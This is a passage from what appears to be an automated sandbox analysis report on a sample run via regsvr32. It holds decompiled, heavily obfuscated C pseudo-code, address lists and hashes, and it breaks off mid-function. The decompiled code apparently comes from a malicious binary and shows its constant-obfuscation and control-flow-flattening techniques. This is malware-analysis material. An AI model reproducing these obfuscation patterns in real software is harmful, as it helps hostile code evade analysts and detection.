				_v1112 = 0x58ca81;
				_v1112 = _v1112 ^ 0x5c6bee45;
				_v1112 = _v1112 ^ 0x42cec489;
				_v1112 = _v1112 ^ 0x1efba26b;
				_v1212 = 0x20d381;
				_v1212 = _v1212 << 7;
				_t559 = 0xf;
				_v1212 = _v1212 / _t559;
				_v1212 = _v1212 | 0x1e192722;
				_v1212 = _v1212 ^ 0x1f1b6437;
				_v1100 = 0x5437a8;
				_v1100 = _v1100 + 0xffffcc2e;
				_v1100 = _v1100 ^ 0x005e23e3;
				_v1140 = 0x4cda07;
				_t560 = 0x2c;
				_v1140 = _v1140 / _t560;
				_v1140 = _v1140 + 0xffffbaf6;
				_v1140 = _v1140 ^ 0x0003f658;
				_v1216 = 0x8d4852;
				_v1216 = _v1216 | 0xe03670ed;
				_v1216 = _v1216 + 0x1fd0;
				_t561 = 0x43;
				_t622 = 0x33;
				_v1216 = _v1216 * 0x51;
				_v1216 = _v1216 ^ 0x1c99c980;
				_v1224 = 0xcb3fbd;
				_v1224 = _v1224 >> 3;
				_v1224 = _v1224 >> 2;
				_v1224 = _v1224 + 0x6dd5;
				_v1224 = _v1224 ^ 0x0000b11a;
				_v1084 = 0xbbd54d;
				_v1084 = _v1084 + 0xffff0a96;
				_v1084 = _v1084 ^ 0x00b3a670;
				_v1092 = 0xc23c8a;
				_v1092 = _v1092 | 0xdd0bee58;
				_v1092 = _v1092 ^ 0xddcf2329;
				_v1116 = 0x207c7d;
				_v1116 = _v1116 >> 0xc;
				_v1116 = _v1116 + 0xffffbc2e;
				_v1116 = _v1116 ^ 0xfff0c7a0;
				_v1208 = 0xff5fdc;
				_v1208 = _v1208 >> 3;
				_v1208 = _v1208 / _t561;
				_v1208 = _v1208 + 0x5b99;
				_v1208 = _v1208 ^ 0x000c7d9c;
				_v1124 = 0x938ccb;
				_v1124 = _v1124 | 0xf2a59521;
				_v1124 = _v1124 ^ 0xa01ac2d2;
				_v1124 = _v1124 ^ 0x52a0185f;
				_v1132 = 0xbf625c;
				_v1132 = _v1132 + 0xffff41d1;
				_v1132 = _v1132 ^ 0xb6f0ee0a;
				_v1132 = _v1132 ^ 0xb64f7318;
				_v1200 = 0x35e8ef;
				_v1200 = _v1200 | 0x212573b9;
				_v1200 = _v1200 + 0x895;
				_v1200 = _v1200 + 0xffff839b;
				_v1200 = _v1200 ^ 0x213eef56;
				_v1108 = 0x42ec6a;
				_v1108 = _v1108 << 7;
				_v1108 = _v1108 | 0x6f96b0e8;
				_v1108 = _v1108 ^ 0x6ff9d07a;
				_v1068 = 0x16fbe8;
				_v1068 = _v1068 ^ 0x63830919;
				_v1068 = _v1068 ^ 0x6391d514;
				_v1076 = 0xf1aa89;
				_v1076 = _v1076 / _t622;
				_v1076 = _v1076 ^ 0x0003c711;
				_v1104 = 0xeb7cfe;
				_v1104 = _v1104 | 0xf803cf3c;
				_v1104 = _v1104 ^ 0xf8e77bb5;
				_v1128 = 0x581134;
				_v1128 = _v1128 + 0x5fcb;
				_v1128 = _v1128 ^ 0xf5e3fdb9;
				_v1128 = _v1128 ^ 0xf5b0cdf6;
				_v1152 = 0xd7df19;
				_v1152 = _v1152 >> 6;
				_v1152 = _v1152 | 0xfed84a26;
				_v1152 = _v1152 ^ 0xfedeec45;
				_v1180 = 0xaef471;
				_v1180 = _v1180 >> 6;
				_v1180 = _v1180 >> 0xd;
				_v1180 = _v1180 << 6;
				_v1180 = _v1180 ^ 0x000710e2;
				_v1204 = 0x713a97;
				_v1204 = _v1204 + 0x3418;
				_t562 = 0x1c;
				_v1204 = _v1204 / _t562;
				_t563 = 0x7a;
				_v1204 = _v1204 / _t563;
				_v1204 = _v1204 ^ 0x00050502;
				_v1164 = 0x147100;
				_t564 = 0x2e;
				_v1164 = _v1164 * 0x76;
				_v1164 = _v1164 | 0x902fa50e;
				_v1164 = _v1164 ^ 0x996cda68;
				_v1088 = 0x82e762;
				_v1088 = _v1088 << 4;
				_v1088 = _v1088 ^ 0x0826efad;
				_v1168 = 0x563db6;
				_v1168 = _v1168 ^ 0x21efc68d;
				_v1168 = _v1168 << 0xa;
				_v1168 = _v1168 ^ 0xe7e33000;
				_v1064 = 0x7b43bb;
				_v1064 = _v1064 >> 0x10;
				_v1064 = _v1064 ^ 0x000ef1dc;
				_v1096 = 0xaa2599;
				_v1096 = _v1096 + 0xffff8899;
				_v1096 = _v1096 ^ 0x00af913c;
				_v1144 = 0x28f47d;
				_v1144 = _v1144 + 0xfdab;
				_v1144 = _v1144 / _t564;
				_v1144 = _v1144 ^ 0x00098579;
				_v1236 = 0xa8cb0e;
				_v1236 = _v1236 + 0xffff80d7;
				_v1236 = _v1236 >> 2;
				_v1236 = _v1236 + 0xcae3;
				_v1236 = _v1236 ^ 0x0028dc98;
				_v1196 = 0x7a9110;
				_v1196 = _v1196 + 0x60a3;
				_t565 = 0x6e;
				_v1196 = _v1196 * 0x30;
				_v1196 = _v1196 + 0x17b0;
				_v1196 = _v1196 ^ 0x17089a70;
				_v1220 = 0xa39dc0;
				_v1220 = _v1220 * 0x1a;
				_v1220 = _v1220 | 0x3f29037d;
				_v1220 = _v1220 << 2;
				_v1220 = _v1220 ^ 0xfef582ff;
				_v1056 = 0x8ce45d;
				_v1056 = _v1056 + 0xffff44b0;
				_v1056 = _v1056 ^ 0x0082f469;
				_v1188 = 0x8fb898;
				_v1188 = _v1188 + 0xffff6148;
				_v1188 = _v1188 >> 0xf;
				_v1188 = _v1188 + 0x5d28;
				_v1188 = _v1188 ^ 0x00098e48;
				_v1248 = 0xf9f351;
				_v1248 = _v1248 / _t565;
				_t566 = 7;
				_v1248 = _v1248 / _t566;
				_t567 = 0x36;
				_v1248 = _v1248 / _t567;
				_v1248 = _v1248 ^ 0x000dac8c;
				_v1156 = 0xcd3e80;
				_v1156 = _v1156 >> 9;
				_v1156 = _v1156 >> 5;
				_v1156 = _v1156 ^ 0x000f52af;
				_v1080 = 0xad13e3;
				_v1080 = _v1080 + 0xffff9fdf;
				_v1080 = _v1080 ^ 0x00a9049f;
				_v1252 = 0xc8e468;
				_v1252 = _v1252 + 0x68f9;
				_v1252 = _v1252 ^ 0xdefda593;
				_v1252 = _v1252 + 0x3ccc;
				_v1252 = _v1252 ^ 0xde346202;
				_v1148 = 0xed4461;
				_t366 =  &_v1148; // 0xed4461
				_t553 = _v1048;
				_v1148 =  *_t366 * 0xe;
				_v1148 = _v1148 + 0x7c4c;
				_v1148 = _v1148 ^ 0x0cf78b8d;
				_v1060 = 0xe451d2;
				_v1060 = _v1060 ^ 0x875d8056;
				_v1060 = _v1060 ^ 0x87bb8ca0;
				_v1072 = 0x7df350;
				_v1072 = _v1072 ^ 0x9db8ae0b;
				_v1072 = _v1072 ^ 0x9dc57cd0;
				_v1240 = 0x736124;
				_v1240 = _v1240 + 0x9999;
				_v1240 = _v1240 ^ 0x06a9f39e;
				_v1240 = _v1240 | 0x60d165a2;
				_v1240 = _v1240 ^ 0x66d70585;
				_v1052 = 0x13e6cc;
				_v1052 = _v1052 | 0xd39d947e;
				_v1052 = _v1052 ^ 0xd3985d28;
				_v1176 = 0xb655df;
				_v1176 = _v1176 << 5;
				_v1176 = _v1176 + 0xb0db;
				_v1176 = _v1176 << 0xe;
				_v1176 = _v1176 ^ 0xdb2d551e;
				_v1184 = 0x6ea346;
				_v1184 = _v1184 << 3;
				_v1184 = _v1184 / _t622;
				_v1184 = _v1184 << 0xf;
				_v1184 = _v1184 ^ 0xad62c0fd;
				_v1192 = 0x1e416;
				_v1192 = _v1192 ^ 0x082852f8;
				_v1192 = _v1192 + 0xffff737f;
				_v1192 = _v1192 * 0x7a;
				_v1192 = _v1192 ^ 0xe39273d4;
				while(1) {
					L1:
					_t568 = 0x5c;
					while(1) {
						L2:
						_t529 = 0x8516fff;
						do {
							L3:
							if(_t620 == 0x487d47d) {
								_t491 =  &_v1176; // 0xe158207a
								E001B3CBE( *_t491, _v1044, _v1184, _v1192);
								_t620 = 0xb449de7;
								goto L18;
							} else {
								if(_t620 == 0x62db77f) {
									_push(_v1224);
									_push(0x1a10bc);
									_push(_v1216);
									_t531 = E001BF5D9(_v1100, _v1140, __eflags);
									_t534 =  *0x1c4c10; // 0x67d820
									_t536 =  *0x1c4c10; // 0x67d820
									E001AD467(_v1092, __eflags, _v1116, _t536 + 4, _v1100, _v1208, _t534 + 0x20c, _v1124, _t531,  &_v1040,  &_v520, _v1132);
									E001BF94B(_t531, _v1200, _v1108, _v1068, _v1076);
									_t626 =  &(_t626[0x10]);
									_t620 = 0xb1ab9aa;
									goto L1;
								} else {
									if(_t620 == _t529) {
										_t544 = E001B7A67(_v1044, _v1232, _v1248, _t553, _v1148, _v1060, _v1072, _v1240,  &_v1040, _v1052, 2 + E001B0184(_v1248, _v1156,  &_v1040, _v1080, _v1252) * 2);
										_t626 =  &(_t626[0xc]);
										__eflags = _t544;
										_t620 = 0x487d47d;
										_v1048 = 0 | __eflags == 0x00000000;
										while(1) {
											L1:
											_t568 = 0x5c;
											goto L2;
										}
									} else {
										if(_t620 == 0x8df682f) {
											_push(_v1180);
											_push(0x1a110c);
											_push(_v1152);
											_t579 = _v1104;
											__eflags = E001A3E99(_v1104, _v1228, _v1204, _v1104, E001BF5D9(_v1104, _v1128, __eflags), _t579, _v1164, _v1088,  &_v1044, _v1168, _t579, _v1172, _v1064, _v1096, _t579, _v1144, _v1236);
											_t620 =  ==  ? 0x8516fff : 0xb449de7;
											E001BF94B(_t545, _v1196, _v1220, _v1056, _v1188);
											_t626 =  &(_t626[0x15]);
											L18:
											_t529 = 0x8516fff;
											_t568 = 0x5c;
										} else {
											if(_t620 == 0xb1ab9aa) {
												_t554 =  *0x1c4c10; // 0x67d820
												_t555 = _t554 + 0x20c;
												while(1) {
													__eflags =  *_t555 - _t568;
													if(__eflags == 0) {
														break;
													}
													_t555 = _t555 + 2;
													__eflags = _t555;
												}
												_t553 = _t555 + 2;
												_t620 = 0x8df682f;
												goto L2;
											} else {
												if(_t620 == 0xb91f4a5) {
													E001A3466(_v1120, _v1244, _t568, _t568,  &_v520, _v1160, _t568, _v1136, _v1112, _v1212);
													_t626 =  &(_t626[8]);
													_t620 = 0x62db77f;
													while(1) {
														L1:
														_t568 = 0x5c;
														L2:
														_t529 = 0x8516fff;
														goto L3;
													}
												}
											}
										}
									}
								}
							}
							__eflags = _t620 - 0xb449de7;
						} while (__eflags != 0);
						return _v1048;
					}
				}
			}


















































































                                                                                                                0x001bd4ae
                                                                                                                0x001bd4b4
                                                                                                                0x001bd4c1
                                                                                                                0x001bd4d2
                                                                                                                0x001bd4d9
                                                                                                                0x001bd4e7
                                                                                                                0x001bd4ec
                                                                                                                0x001bd4f5
                                                                                                                0x001bd500
                                                                                                                0x001bd508
                                                                                                                0x001bd510
                                                                                                                0x001bd518
                                                                                                                0x001bd520
                                                                                                                0x001bd528
                                                                                                                0x001bd530
                                                                                                                0x001bd538
                                                                                                                0x001bd540
                                                                                                                0x001bd548
                                                                                                                0x001bd550
                                                                                                                0x001bd55a
                                                                                                                0x001bd55d
                                                                                                                0x001bd561
                                                                                                                0x001bd569
                                                                                                                0x001bd571
                                                                                                                0x001bd581
                                                                                                                0x001bd585
                                                                                                                0x001bd58d
                                                                                                                0x001bd592
                                                                                                                0x001bd59a
                                                                                                                0x001bd5a2
                                                                                                                0x001bd5aa
                                                                                                                0x001bd5af
                                                                                                                0x001bd5b7
                                                                                                                0x001bd5c2
                                                                                                                0x001bd5d4
                                                                                                                0x001bd5d9
                                                                                                                0x001bd5e2
                                                                                                                0x001bd5ed
                                                                                                                0x001bd5f8
                                                                                                                0x001bd603
                                                                                                                0x001bd60e
                                                                                                                0x001bd619
                                                                                                                0x001bd621
                                                                                                                0x001bd62a
                                                                                                                0x001bd62f
                                                                                                                0x001bd635
                                                                                                                0x001bd63d
                                                                                                                0x001bd645
                                                                                                                0x001bd650
                                                                                                                0x001bd65b
                                                                                                                0x001bd666
                                                                                                                0x001bd678
                                                                                                                0x001bd67b
                                                                                                                0x001bd682
                                                                                                                0x001bd68d
                                                                                                                0x001bd698
                                                                                                                0x001bd6a0
                                                                                                                0x001bd6aa
                                                                                                                0x001bd6b9
                                                                                                                0x001bd6bc
                                                                                                                0x001bd6bd
                                                                                                                0x001bd6c1
                                                                                                                0x001bd6c9
                                                                                                                0x001bd6d1
                                                                                                                0x001bd6d6
                                                                                                                0x001bd6db
                                                                                                                0x001bd6e3
                                                                                                                0x001bd6eb
                                                                                                                0x001bd6f6
                                                                                                                0x001bd701
                                                                                                                0x001bd70c
                                                                                                                0x001bd717
                                                                                                                0x001bd722
                                                                                                                0x001bd72d
                                                                                                                0x001bd738
                                                                                                                0x001bd740
                                                                                                                0x001bd74b
                                                                                                                0x001bd756
                                                                                                                0x001bd75e
                                                                                                                0x001bd76b
                                                                                                                0x001bd76f
                                                                                                                0x001bd777
                                                                                                                0x001bd77f
                                                                                                                0x001bd78a
                                                                                                                0x001bd795
                                                                                                                0x001bd7a0
                                                                                                                0x001bd7ab
                                                                                                                0x001bd7b6
                                                                                                                0x001bd7c1
                                                                                                                0x001bd7cc
                                                                                                                0x001bd7d7
                                                                                                                0x001bd7df
                                                                                                                0x001bd7e7
                                                                                                                0x001bd7ef
                                                                                                                0x001bd7f7
                                                                                                                0x001bd7ff
                                                                                                                0x001bd80a
                                                                                                                0x001bd812
                                                                                                                0x001bd81d
                                                                                                                0x001bd828
                                                                                                                0x001bd833
                                                                                                                0x001bd83e
                                                                                                                0x001bd849
                                                                                                                0x001bd85f
                                                                                                                0x001bd868
                                                                                                                0x001bd873
                                                                                                                0x001bd87e
                                                                                                                0x001bd889
                                                                                                                0x001bd894
                                                                                                                0x001bd89f
                                                                                                                0x001bd8aa
                                                                                                                0x001bd8b5
                                                                                                                0x001bd8c0
                                                                                                                0x001bd8c8
                                                                                                                0x001bd8cd
                                                                                                                0x001bd8d5
                                                                                                                0x001bd8dd
                                                                                                                0x001bd8e5
                                                                                                                0x001bd8ea
                                                                                                                0x001bd8ef
                                                                                                                0x001bd8f4
                                                                                                                0x001bd8fc
                                                                                                                0x001bd904
                                                                                                                0x001bd910
                                                                                                                0x001bd913
                                                                                                                0x001bd91f
                                                                                                                0x001bd924
                                                                                                                0x001bd92a
                                                                                                                0x001bd932
                                                                                                                0x001bd93f
                                                                                                                0x001bd942
                                                                                                                0x001bd946
                                                                                                                0x001bd94e
                                                                                                                0x001bd956
                                                                                                                0x001bd961
                                                                                                                0x001bd969
                                                                                                                0x001bd974
                                                                                                                0x001bd97c
                                                                                                                0x001bd984
                                                                                                                0x001bd989
                                                                                                                0x001bd991
                                                                                                                0x001bd99c
                                                                                                                0x001bd9a4
                                                                                                                0x001bd9af
                                                                                                                0x001bd9ba
                                                                                                                0x001bd9c5
                                                                                                                0x001bd9d0
                                                                                                                0x001bd9db
                                                                                                                0x001bd9f1
                                                                                                                0x001bd9f8
                                                                                                                0x001bda03
                                                                                                                0x001bda0b
                                                                                                                0x001bda13
                                                                                                                0x001bda18
                                                                                                                0x001bda20
                                                                                                                0x001bda28
                                                                                                                0x001bda30
                                                                                                                0x001bda3d
                                                                                                                0x001bda40
                                                                                                                0x001bda44
                                                                                                                0x001bda4c
                                                                                                                0x001bda54
                                                                                                                0x001bda61
                                                                                                                0x001bda65
                                                                                                                0x001bda6d
                                                                                                                0x001bda72
                                                                                                                0x001bda7a
                                                                                                                0x001bda85
                                                                                                                0x001bda90
                                                                                                                0x001bda9b
                                                                                                                0x001bdaa3
                                                                                                                0x001bdaab
                                                                                                                0x001bdab0
                                                                                                                0x001bdab8
                                                                                                                0x001bdac0
                                                                                                                0x001bdad0
                                                                                                                0x001bdad8
                                                                                                                0x001bdadd
                                                                                                                0x001bdae7
                                                                                                                0x001bdaea
                                                                                                                0x001bdaee
                                                                                                                0x001bdaf6
                                                                                                                0x001bdafe
                                                                                                                0x001bdb05
                                                                                                                0x001bdb0f
                                                                                                                0x001bdb17
                                                                                                                0x001bdb22
                                                                                                                0x001bdb2d
                                                                                                                0x001bdb38
                                                                                                                0x001bdb40
                                                                                                                0x001bdb48
                                                                                                                0x001bdb50
                                                                                                                0x001bdb58
                                                                                                                0x001bdb60
                                                                                                                0x001bdb68
                                                                                                                0x001bdb6d
                                                                                                                0x001bdb74
                                                                                                                0x001bdb78
                                                                                                                0x001bdb80
                                                                                                                0x001bdb88
                                                                                                                0x001bdb93
                                                                                                                0x001bdb9e
                                                                                                                0x001bdba9
                                                                                                                0x001bdbb4
                                                                                                                0x001bdbbf
                                                                                                                0x001bdbca
                                                                                                                0x001bdbd2
                                                                                                                0x001bdbda
                                                                                                                0x001bdbe2
                                                                                                                0x001bdbea
                                                                                                                0x001bdbf2
                                                                                                                0x001bdbfd
                                                                                                                0x001bdc08
                                                                                                                0x001bdc13
                                                                                                                0x001bdc1b
                                                                                                                0x001bdc20
                                                                                                                0x001bdc28
                                                                                                                0x001bdc2d
                                                                                                                0x001bdc35
                                                                                                                0x001bdc3d
                                                                                                                0x001bdc48
                                                                                                                0x001bdc4c
                                                                                                                0x001bdc51
                                                                                                                0x001bdc59
                                                                                                                0x001bdc61
                                                                                                                0x001bdc69
                                                                                                                0x001bdc76
                                                                                                                0x001bdc7a
                                                                                                                0x001bdc82
                                                                                                                0x001bdc82
                                                                                                                0x001bdc84
                                                                                                                0x001bdc85
                                                                                                                0x001bdc85
                                                                                                                0x001bdc85
                                                                                                                0x001bdc8a
                                                                                                                0x001bdc8a
                                                                                                                0x001bdc90
                                                                                                                0x001bdefc
                                                                                                                0x001bdf00
                                                                                                                0x001bdf07
                                                                                                                0x00000000
                                                                                                                0x001bdc96
                                                                                                                0x001bdc9c
                                                                                                                0x001bde49
                                                                                                                0x001bde4d
                                                                                                                0x001bde52
                                                                                                                0x001bde64
                                                                                                                0x001bde8d
                                                                                                                0x001bde9c
                                                                                                                0x001bdebb
                                                                                                                0x001bdedb
                                                                                                                0x001bdee0
                                                                                                                0x001bdee3
                                                                                                                0x00000000
                                                                                                                0x001bdca2
                                                                                                                0x001bdca4
                                                                                                                0x001bde29
                                                                                                                0x001bde30
                                                                                                                0x001bde33
                                                                                                                0x001bde35
                                                                                                                0x001bde3d
                                                                                                                0x001bdc82
                                                                                                                0x001bdc82
                                                                                                                0x001bdc84
                                                                                                                0x00000000
                                                                                                                0x001bdc84
                                                                                                                0x001bdcaa
                                                                                                                0x001bdcb0
                                                                                                                0x001bdd24
                                                                                                                0x001bdd28
                                                                                                                0x001bdd2d
                                                                                                                0x001bdd38
                                                                                                                0x001bdd9c
                                                                                                                0x001bddb9
                                                                                                                0x001bddbc
                                                                                                                0x001bddc1
                                                                                                                0x001bdf09
                                                                                                                0x001bdf0b
                                                                                                                0x001bdf10
                                                                                                                0x001bdcb2
                                                                                                                0x001bdcb8
                                                                                                                0x001bdd01
                                                                                                                0x001bdd07
                                                                                                                0x001bdd12
                                                                                                                0x001bdd12
                                                                                                                0x001bdd15
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001bdd0f
                                                                                                                0x001bdd0f
                                                                                                                0x001bdd0f
                                                                                                                0x001bdd17
                                                                                                                0x001bdd1a
                                                                                                                0x00000000
                                                                                                                0x001bdcba
                                                                                                                0x001bdcc0
                                                                                                                0x001bdcf2
                                                                                                                0x001bdcf7
                                                                                                                0x001bdcfa
                                                                                                                0x001bdc82
                                                                                                                0x001bdc82
                                                                                                                0x001bdc84
                                                                                                                0x001bdc85
                                                                                                                0x001bdc85
                                                                                                                0x00000000
                                                                                                                0x001bdc85
                                                                                                                0x001bdc82
                                                                                                                0x001bdcc0
                                                                                                                0x001bdcb8
                                                                                                                0x001bdcb0
                                                                                                                0x001bdca4
                                                                                                                0x001bdc9c
                                                                                                                0x001bdf11
                                                                                                                0x001bdf11
                                                                                                                0x001bdf2a
                                                                                                                0x001bdf2a
                                                                                                                0x001bdc85

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $as$(]$Ek\$V>!$aD$jB$z X$}| $#^$p6
                                                                                                                • API String ID: 0-2883086406
                                                                                                                • Opcode ID: b29294bd4ddd7c74958157e1b4b3505322f984d5a7d943c7fe9b08f789d04070
                                                                                                                • Instruction ID: 6693619d0020e354cc4a12ecd54cae82f993e6c0163ca2e678e0b71a448ac45c
                                                                                                                • Opcode Fuzzy Hash: b29294bd4ddd7c74958157e1b4b3505322f984d5a7d943c7fe9b08f789d04070
                                                                                                                • Instruction Fuzzy Hash: CA3201B15083809FE3B8CF61D94AB8BBBE1BBD4718F10891DE19996260D7B58949CF43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001B9A0C Relevance: 12.9, Strings: 10, Instructions: 416COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 97%
                                                                                                                			E001B9A0C(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _t509;
				signed int _t525;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t532;
				signed int _t533;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				signed int _t538;
				signed int _t539;
				void* _t594;
				void* _t595;
				signed int* _t599;

				_t599 =  &_v2792;
				_v2756 = 0x8b462a;
				_v2756 = _v2756 << 7;
				_v2756 = _v2756 << 2;
				_t594 = __ecx;
				_t595 = 0x2b81e36;
				_t528 = 0x7f;
				_v2756 = _v2756 / _t528;
				_v2756 = _v2756 ^ 0x002d73a6;
				_v2708 = 0x633b85;
				_v2708 = _v2708 >> 7;
				_v2708 = _v2708 + 0x5922;
				_v2708 = _v2708 ^ 0x0003c950;
				_v2784 = 0xe426c6;
				_v2784 = _v2784 ^ 0xd2dd7835;
				_v2784 = _v2784 << 7;
				_v2784 = _v2784 << 3;
				_v2784 = _v2784 ^ 0xe5718cdd;
				_v2752 = 0xd0eee8;
				_t529 = 0x54;
				_v2752 = _v2752 * 0x25;
				_v2752 = _v2752 * 0x1c;
				_v2752 = _v2752 | 0x8383c9b1;
				_v2752 = _v2752 ^ 0xcf8aa7ef;
				_v2644 = 0xdaa9c4;
				_v2644 = _v2644 << 3;
				_v2644 = _v2644 ^ 0x06d49410;
				_v2776 = 0xe490f3;
				_v2776 = _v2776 | 0x6931665c;
				_v2776 = _v2776 ^ 0x92a35c95;
				_v2776 = _v2776 + 0x5def;
				_v2776 = _v2776 ^ 0xfb543939;
				_v2720 = 0x26d621;
				_v2720 = _v2720 / _t529;
				_v2720 = _v2720 + 0xfffffe3e;
				_t530 = 0x2c;
				_v2720 = _v2720 / _t530;
				_v2720 = _v2720 ^ 0x00031e9d;
				_v2768 = 0x9ff49c;
				_v2768 = _v2768 >> 0xd;
				_v2768 = _v2768 + 0x8c12;
				_t531 = 0x3e;
				_t525 = 0x6c;
				_v2768 = _v2768 * 0x6a;
				_v2768 = _v2768 ^ 0x003bfbed;
				_v2604 = 0x2c76cd;
				_v2604 = _v2604 / _t531;
				_v2604 = _v2604 ^ 0x0005e9c3;
				_v2652 = 0x67c066;
				_v2652 = _v2652 + 0x8a90;
				_v2652 = _v2652 ^ 0x006fea0e;
				_v2744 = 0xb6bdce;
				_v2744 = _v2744 + 0xffff673d;
				_v2744 = _v2744 / _t525;
				_v2744 = _v2744 >> 5;
				_v2744 = _v2744 ^ 0x0005d1a5;
				_v2760 = 0x12c367;
				_v2760 = _v2760 ^ 0xaed4666a;
				_v2760 = _v2760 + 0xffffa2e1;
				_v2760 = _v2760 << 0xd;
				_v2760 = _v2760 ^ 0xc8f43720;
				_v2700 = 0x77851a;
				_v2700 = _v2700 >> 6;
				_v2700 = _v2700 << 1;
				_v2700 = _v2700 ^ 0x000de19f;
				_v2728 = 0xf7c46c;
				_t532 = 0x64;
				_v2728 = _v2728 / _t532;
				_v2728 = _v2728 << 8;
				_v2728 = _v2728 >> 0xe;
				_v2728 = _v2728 ^ 0x00061015;
				_v2684 = 0x3733b7;
				_v2684 = _v2684 + 0x8c33;
				_t533 = 0x42;
				_v2684 = _v2684 * 0x1e;
				_v2684 = _v2684 ^ 0x068d1aa9;
				_v2608 = 0xa30c57;
				_v2608 = _v2608 | 0x32f38184;
				_v2608 = _v2608 ^ 0x32fef82e;
				_v2792 = 0x4dd6a5;
				_v2792 = _v2792 + 0x34a9;
				_v2792 = _v2792 + 0xffff2f8e;
				_v2792 = _v2792 << 0xe;
				_v2792 = _v2792 ^ 0x4eb4c2c8;
				_v2660 = 0x67d938;
				_v2660 = _v2660 * 0x2a;
				_v2660 = _v2660 ^ 0x1108f31e;
				_v2736 = 0x394e87;
				_v2736 = _v2736 + 0xfffff2b1;
				_v2736 = _v2736 + 0x57ed;
				_v2736 = _v2736 * 0x6e;
				_v2736 = _v2736 ^ 0x18b51b0c;
				_v2616 = 0x598eb0;
				_v2616 = _v2616 + 0x1b1c;
				_v2616 = _v2616 ^ 0x005ac433;
				_v2636 = 0xbba071;
				_v2636 = _v2636 >> 3;
				_v2636 = _v2636 ^ 0x0015d859;
				_v2668 = 0xe8047f;
				_v2668 = _v2668 >> 5;
				_v2668 = _v2668 | 0xce4e65b3;
				_v2668 = _v2668 ^ 0xce420057;
				_v2788 = 0x3a8387;
				_v2788 = _v2788 | 0xd19013cd;
				_v2788 = _v2788 << 6;
				_v2788 = _v2788 + 0xfb6c;
				_v2788 = _v2788 ^ 0x6ea014bf;
				_v2676 = 0x6ce937;
				_t197 =  &_v2676; // 0x6ce937
				_v2676 =  *_t197 / _t533;
				_t203 =  &_v2676; // 0x6ce937
				_t534 = 0x27;
				_v2676 =  *_t203 / _t525;
				_v2676 = _v2676 ^ 0x000ecd40;
				_v2780 = 0xc2e9de;
				_v2780 = _v2780 / _t534;
				_t535 = 0x1b;
				_v2780 = _v2780 / _t535;
				_t536 = 9;
				_v2780 = _v2780 / _t536;
				_v2780 = _v2780 ^ 0x00012567;
				_v2628 = 0x1ff059;
				_v2628 = _v2628 >> 2;
				_v2628 = _v2628 ^ 0x0007b3c9;
				_v2692 = 0x3fd0ac;
				_t537 = 0x67;
				_v2692 = _v2692 * 0x16;
				_v2692 = _v2692 + 0x3c9a;
				_v2692 = _v2692 ^ 0x057da600;
				_v2656 = 0x8b578e;
				_v2656 = _v2656 ^ 0x7c84749f;
				_v2656 = _v2656 ^ 0x7c0732b4;
				_v2764 = 0x6f0346;
				_v2764 = _v2764 >> 5;
				_v2764 = _v2764 * 0x42;
				_v2764 = _v2764 ^ 0x343722c1;
				_v2764 = _v2764 ^ 0x34d5f76e;
				_v2772 = 0x3cc9dd;
				_v2772 = _v2772 >> 8;
				_v2772 = _v2772 << 5;
				_v2772 = _v2772 ^ 0x63b7b5d4;
				_v2772 = _v2772 ^ 0x63bb2f04;
				_v2620 = 0x310fdb;
				_v2620 = _v2620 * 0x56;
				_v2620 = _v2620 ^ 0x1070788e;
				_v2612 = 0x12413;
				_v2612 = _v2612 + 0xffffe6cc;
				_v2612 = _v2612 ^ 0x0008dd99;
				_v2640 = 0x7b7a34;
				_v2640 = _v2640 | 0xe7cdc1d4;
				_v2640 = _v2640 ^ 0xe7fb548d;
				_v2648 = 0x960a31;
				_v2648 = _v2648 | 0x113a4a82;
				_v2648 = _v2648 ^ 0x11b59ced;
				_v2704 = 0x41502d;
				_v2704 = _v2704 + 0x80c0;
				_v2704 = _v2704 + 0xffff0c99;
				_v2704 = _v2704 ^ 0x0042838f;
				_v2712 = 0xe11d52;
				_v2712 = _v2712 / _t537;
				_v2712 = _v2712 << 8;
				_v2712 = _v2712 ^ 0x02279cb3;
				_v2688 = 0xc7861a;
				_v2688 = _v2688 | 0x2d38511c;
				_t538 = 0x38;
				_v2688 = _v2688 * 0x3c;
				_v2688 = _v2688 ^ 0xc7f638fb;
				_v2740 = 0xe39dba;
				_v2740 = _v2740 / _t538;
				_v2740 = _v2740 * 0x6a;
				_v2740 = _v2740 + 0xffff55ab;
				_v2740 = _v2740 ^ 0x01abda38;
				_v2748 = 0xd1f198;
				_v2748 = _v2748 >> 0xa;
				_v2748 = _v2748 >> 7;
				_v2748 = _v2748 << 0x10;
				_v2748 = _v2748 ^ 0x006e7c4d;
				_v2696 = 0x30d40c;
